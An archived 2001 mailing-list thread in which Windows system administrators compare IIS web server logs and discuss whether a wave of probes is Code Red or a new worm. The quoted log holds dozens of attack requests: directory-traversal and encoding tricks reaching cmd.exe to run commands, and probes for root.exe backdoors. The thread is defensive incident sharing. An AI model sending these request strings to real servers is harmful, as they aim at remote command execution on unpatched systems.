RE: WARNING: Hacker Alert

John Cesta - Lists Tue, 18 Sep 2001 08:39:52 -0700
looks like the same old code red to me.

> -----Original Message-----
> From: Randal, Phil [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 11:23 AM
> To: NT System Admin Issues
> Subject: RE: WARNING: Hacker Alert
>
>
> Looks like a new worm to me.  Probably planted on all those
> Code Red compromised servers :-(
>
> Phil
>
> ---------------------------------------------
> Phil Randal
> Network Engineer
> Herefordshire Council
> Hereford, UK
>
> > -----Original Message-----
> > From: Jason Morris [mailto:[EMAIL PROTECTED]]
> > Sent: 18 September 2001 15:59
> > To: NT System Admin Issues
> > Subject: RE: WARNING: Hacker Alert
> >
> >
> > CodeRed seems to have dwindled to nothing on my logs. But it's being
> > replaced with the EXACT same lines you have below, and they
> > stay consistent
> > with the code red 2 methods of attacking the more local subnets.
> >
> > Jason Morris CCDA CCNP
> > Network Administrator
> > MJMC, Inc.
> > 708-225-2350
> > [EMAIL PROTECTED]
> >
> >
> > -----Original Message-----
> > From: Jason Morris [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 9:50 AM
> > To: NT System Admin Issues
> > Cc: '[EMAIL PROTECTED]'
> > Subject: RE: WARNING: Hacker Alert
> >
> >
> > Yes. It seems to be systems I have previously monitored
> > hitting me with
> > codered attacks. I bet someone is activating all of their children.
> >
> > Jason Morris CCDA CCNP
> > Network Administrator
> > MJMC, Inc.
> > 708-225-2350
> > [EMAIL PROTECTED]
> >
> >
> > -----Original Message-----
> > From: xylog [mailto:[EMAIL PROTECTED]]
> > Sent: Tuesday, September 18, 2001 9:45 AM
> > To: NT System Admin Issues
> > Subject: WARNING: Hacker Alert
> >
> >
> > All my public facing web servers at home and at my office have shown a
> > huge continuous hacking activity. Has anyone seen similar? I fear this
> > may be code red related or automated. Please comment if you have seen
> > similar. Here is an excerpt from one logfile:
> >
> > 63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 145,
> > 0, 500, 87, GET,
> > /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system
> > 32/cmd.exe
> > , /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
> > 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
> > 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
> > 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
> > 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 98,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 100,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.9.107, -, 9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> > 64.156.252.27, -, 9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156,
> > 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> > 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 72,
> > 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 70,
> > 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 80,
> > 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15,
> > 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:06, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
> > 117, 0, 500, 87, GET,
> > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
> > 117, 0, 500, 87, GET,
> > /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
> > 145, 0, 500, 87, GET,
> > /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system
> > 32/cmd.exe
> > , /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15,
> > 97, 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> > 64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156,
> > 41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> > 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
> > 97, 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16,
> > 97, 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 97,
> > 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 98,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0,
> > 100, 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.101.171.231, -, 9/18/01, 10:37:17, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:21, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 72,
> > 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 70,
> > 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 80,
> > 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:26, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 80,
> > 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:28, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:34, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 117,
> > 0, 500, 87, GET,
> > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 117,
> > 0, 500, 87, GET,
> > /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 145,
> > 0, 500, 87, GET,
> > /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system
> > 32/cmd.exe
> > , /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 72,
> > 604, 404, 3, GET, /scripts/root.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 70,
> > 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 80,
> > 604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 80,
> > 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 117,
> > 0, 500, 87, GET,
> > /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 117,
> > 0, 500, 87, GET,
> > /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 145,
> > 0, 500, 87, GET,
> > /msadc/..%5c../..%5c../..%5c/..�../..�../..�../winnt/system
> > 32/cmd.exe
> > , /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01,
> > x.x.x.x, 15, 97,
> > 604, 404, 3, GET, /scripts/..�../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01,
> > x.x.x.x, 16, 97,
> > 604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01,
> > x.x.x.x, 15, 97,
> > 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 97,
> > 604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 98,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 64.156.252.27, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172,
> > 41, 13973, 200, 0, GET, /mpf-flow/flow/login.cfm, -,
> > 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:45, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 100,
> > 0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
> > 63.114.34.130, -, 9/18/01, 10:39:47, W3SVC4, DC1DIIS01,
> > x.x.x.x, 0, 96,
> > 0, 500, 87, GET, /scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
> >
> >
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > Confidential:  This e-mail and any files transmitted with it are the
> > property of Lanco International and/or its affiliates, are
> > confidential, and
> > are intended solely for the use of the individual or entity
> > to whom this
> > e-mail is addressed. If you are not one of the named recipient(s) or
> > otherwise have reason to believe that you have received this
> > message in
> > error, please notify the sender at the above e-mail address
> > and delete this
> > message immediately from your computer.  Any other use, retention,
> > dissemination, forwarding, printing or copying of this e-mail
> > is strictly
> > prohibited.
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> > Confidential:  This e-mail and any files transmitted with it are the
> > property of Lanco International and/or its affiliates, are
> > confidential, and
> > are intended solely for the use of the individual or entity
> > to whom this
> > e-mail is addressed. If you are not one of the named recipient(s) or
> > otherwise have reason to believe that you have received this
> > message in
> > error, please notify the sender at the above e-mail address
> > and delete this
> > message immediately from your computer.  Any other use, retention,
> > dissemination, forwarding, printing or copying of this e-mail
> > is strictly
> > prohibited.
> >
> > http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
> >
>
> http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
>
>


http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: WARNING: Hacker Alert

Reply via email to
